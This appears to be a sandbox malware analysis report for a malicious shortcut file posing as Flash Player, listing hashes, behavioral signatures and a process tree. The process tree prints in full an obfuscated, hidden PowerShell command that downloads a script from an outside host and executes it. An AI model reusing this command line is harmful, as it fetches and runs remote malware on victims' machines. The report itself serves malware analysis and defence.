Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240221-en
resource tags
arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted
12/05/2024, 01:00
Static task
static1
Behavioral task
behavioral1
Sample
Flash_Player.lnk
Resource
win7-20240221-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
Flash_Player.lnk
Resource
win10v2004-20240508-en
6 signatures
150 seconds
General
-
Target
Flash_Player.lnk
-
Size
3KB
-
MD5
a591b0170684749815c8643e4e6276fc
-
SHA1
caf54132c73b833a654fe90e8d9842bd00fc4d85
-
SHA256
565836c76728f4e8e371a4cc8e35a76d24c52bb995607d63002bf893b51b5ede
-
SHA512
b6e3ac67762a339e1ff22e93749d944c111f536a5735fcdb496bbb3e83f1dcbe522c3a183a9ed1c6b711f096e468c12b4857bf0908272a549a9c187a384e3f42
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
PID   Process
2708  powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
PID   Process
2708  powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
Description              PID   Process
Token: SeDebugPrivilege  2708  powershell.exe
Suspicious use of WriteProcessMemory 3 IoCs
Description                     PID   Process  procid_target
PID 1812 wrote to memory of 2708  1812  cmd.exe  29
PID 1812 wrote to memory of 2708  1812  cmd.exe  29
PID 1812 wrote to memory of 2708  1812  cmd.exe  29
Processes
-
C:\Windows\system32\cmd.exe
Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Flash_Player.lnk
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -command Set-Variable -Name dkn -value BitsTransfer;Import-Module $dkn; Set-Variable -Name tla -value https;Set-Variable -Name qhu -value wsf;Start-BitsTransfer "$tla`://1263929185.rsc.cdn77.org/p2rv2.php?aHR0cHM6Ly8xMjYzOTI5MTg1LnJzYy5jZG43Ny5vcmd8SkJONQ%3D%3D" "$env:ALLUSERSPROFILE\jli.$qhu"; Start-Process "$env:ALLUSERSPROFILE\jli.$qhu";
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-